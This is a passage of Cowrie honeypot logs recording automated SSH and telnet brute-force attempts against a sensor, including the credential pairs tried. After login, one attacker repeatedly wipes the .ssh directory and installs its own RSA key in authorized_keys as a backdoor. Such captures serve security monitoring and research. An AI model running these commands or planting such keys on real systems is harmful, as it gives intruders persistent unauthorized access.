{"eventid":"cowrie.login.failed","username":"liquidator","password":"liquidator","message":"login attempt [liquidator/liquidator] failed","sensor":"my-vps","timestamp":"2025-08-26T13:02:07.555993Z","src_ip":"93.123.109.189","session":"80fbed9c3de7"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:08.578191Z","src_ip":"93.123.109.189","session":"80fbed9c3de7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:17.214636Z","src_ip":"212.227.235.229","session":"71cc4b0ac53f"}
{"eventid":"cowrie.session.closed","duration":180.27959632873535,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:17.219463Z","src_ip":"212.227.235.229","session":"71cc4b0ac53f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57644,"dst_ip":"1.2.3.4","dst_port":22,"session":"d496df0877e1","protocol":"ssh","message":"New connection: 212.227.235.229:57644 (1.2.3.4:22) [session: d496df0877e1]","sensor":"my-vps","timestamp":"2025-08-26T13:02:29.763152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:02:29.764112Z","src_ip":"212.227.235.229","session":"d496df0877e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:02:30.005935Z","src_ip":"212.227.235.229","session":"d496df0877e1"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc.123456","message":"login attempt [root/Abc.123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:02:31.013601Z","src_ip":"212.227.235.229","session":"d496df0877e1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:02:31.518217Z","src_ip":"212.227.235.229","session":"d496df0877e1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:02:31.519048Z","src_ip":"212.227.235.229","session":"d496df0877e1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:02:31.520053Z","src_ip":"212.227.235.229","session":"d496df0877e1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:31.763157Z","src_ip":"212.227.235.229","session":"d496df0877e1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:02:32.347333Z","src_ip":"212.227.235.229","session":"d496df0877e1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:02:32.347813Z","src_ip":"212.227.235.229","session":"d496df0877e1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:02:32.593275Z","src_ip":"212.227.235.229","session":"d496df0877e1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:32.594299Z","src_ip":"212.227.235.229","session":"d496df0877e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59954,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ab34f436642","protocol":"ssh","message":"New connection: 212.227.235.229:59954 (1.2.3.4:22) [session: 5ab34f436642]","sensor":"my-vps","timestamp":"2025-08-26T13:02:32.832653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:02:32.833712Z","src_ip":"212.227.235.229","session":"5ab34f436642"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:02:33.074330Z","src_ip":"212.227.235.229","session":"5ab34f436642"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:02:34.079839Z","src_ip":"212.227.235.229","session":"5ab34f436642"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39891,"dst_ip":"1.2.3.4","dst_port":22,"session":"f183a4d469e9","protocol":"ssh","message":"New connection: 212.227.235.229:39891 (1.2.3.4:22) [session: f183a4d469e9]","sensor":"my-vps","timestamp":"2025-08-26T13:02:34.737193Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:02:34.741322Z","src_ip":"212.227.235.229","session":"f183a4d469e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:02:34.951804Z","src_ip":"212.227.235.229","session":"f183a4d469e9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:35.322213Z","src_ip":"212.227.235.229","session":"5ab34f436642"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33802,"dst_ip":"1.2.3.4","dst_port":22,"session":"45c6589fa9cb","protocol":"ssh","message":"New connection: 212.227.235.229:33802 (1.2.3.4:22) [session: 45c6589fa9cb]","sensor":"my-vps","timestamp":"2025-08-26T13:02:35.563410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:02:35.564843Z","src_ip":"212.227.235.229","session":"45c6589fa9cb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:02:35.807010Z","src_ip":"212.227.235.229","session":"45c6589fa9cb"}
{"eventid":"cowrie.login.success","username":"root","password":"Pass2024","message":"login attempt [root/Pass2024] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:02:35.821737Z","src_ip":"212.227.235.229","session":"f183a4d469e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:02:36.302883Z","src_ip":"212.227.235.229","session":"f183a4d469e9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:02:36.303620Z","src_ip":"212.227.235.229","session":"f183a4d469e9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:02:36.304836Z","src_ip":"212.227.235.229","session":"f183a4d469e9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:36.508186Z","src_ip":"212.227.235.229","session":"f183a4d469e9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:02:36.819455Z","src_ip":"212.227.235.229","session":"45c6589fa9cb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:02:36.930808Z","src_ip":"212.227.235.229","session":"f183a4d469e9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:02:36.931555Z","src_ip":"212.227.235.229","session":"f183a4d469e9"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:37.062791Z","src_ip":"212.227.235.229","session":"45c6589fa9cb"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:37.063617Z","src_ip":"212.227.235.229","session":"d496df0877e1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:02:37.137103Z","src_ip":"212.227.235.229","session":"f183a4d469e9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:37.138092Z","src_ip":"212.227.235.229","session":"f183a4d469e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41416,"dst_ip":"1.2.3.4","dst_port":22,"session":"a984e2e92626","protocol":"ssh","message":"New connection: 212.227.235.229:41416 (1.2.3.4:22) [session: a984e2e92626]","sensor":"my-vps","timestamp":"2025-08-26T13:02:37.358209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:02:37.359193Z","src_ip":"212.227.235.229","session":"a984e2e92626"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:02:37.578274Z","src_ip":"212.227.235.229","session":"a984e2e92626"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:02:38.522630Z","src_ip":"212.227.235.229","session":"a984e2e92626"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:39.743509Z","src_ip":"212.227.235.229","session":"a984e2e92626"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60216,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb1a64ef08c8","protocol":"ssh","message":"New connection: 217.72.205.35:60216 (1.2.3.4:22) [session: eb1a64ef08c8]","sensor":"my-vps","timestamp":"2025-08-26T13:02:40.082491Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:40.083541Z","src_ip":"217.72.205.35","session":"eb1a64ef08c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42738,"dst_ip":"1.2.3.4","dst_port":22,"session":"eff8926285ea","protocol":"ssh","message":"New connection: 212.227.235.229:42738 (1.2.3.4:22) [session: eff8926285ea]","sensor":"my-vps","timestamp":"2025-08-26T13:02:42.948256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:02:42.949297Z","src_ip":"212.227.235.229","session":"eff8926285ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:02:43.161244Z","src_ip":"212.227.235.229","session":"eff8926285ea"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:02:44.037694Z","src_ip":"212.227.235.229","session":"eff8926285ea"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:44.249497Z","src_ip":"212.227.235.229","session":"eff8926285ea"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:02:44.256959Z","src_ip":"212.227.235.229","session":"f183a4d469e9"}
{"eventid":"cowrie.session.connect","src_ip":"178.128.252.101","src_port":43362,"dst_ip":"1.2.3.4","dst_port":23,"session":"adc174f94b7c","protocol":"telnet","message":"New connection: 178.128.252.101:43362 (1.2.3.4:23) [session: adc174f94b7c]","sensor":"my-vps","timestamp":"2025-08-26T13:03:07.516011Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T13:03:07.599352Z","src_ip":"178.128.252.101","session":"adc174f94b7c"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T13:03:08.738059Z","src_ip":"178.128.252.101","session":"adc174f94b7c"}
{"eventid":"cowrie.session.closed","duration":2.3697850704193115,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:03:09.885725Z","src_ip":"178.128.252.101","session":"adc174f94b7c"}
{"eventid":"cowrie.session.connect","src_ip":"178.128.252.101","src_port":43372,"dst_ip":"1.2.3.4","dst_port":23,"session":"3bad41800151","protocol":"telnet","message":"New connection: 178.128.252.101:43372 (1.2.3.4:23) [session: 3bad41800151]","sensor":"my-vps","timestamp":"2025-08-26T13:03:09.907394Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:03:10.005978Z","src_ip":"178.128.252.101","session":"3bad41800151"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:03:10.084817Z","src_ip":"178.128.252.101","session":"3bad41800151"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T13:03:10.160017Z","src_ip":"178.128.252.101","session":"3bad41800151"}
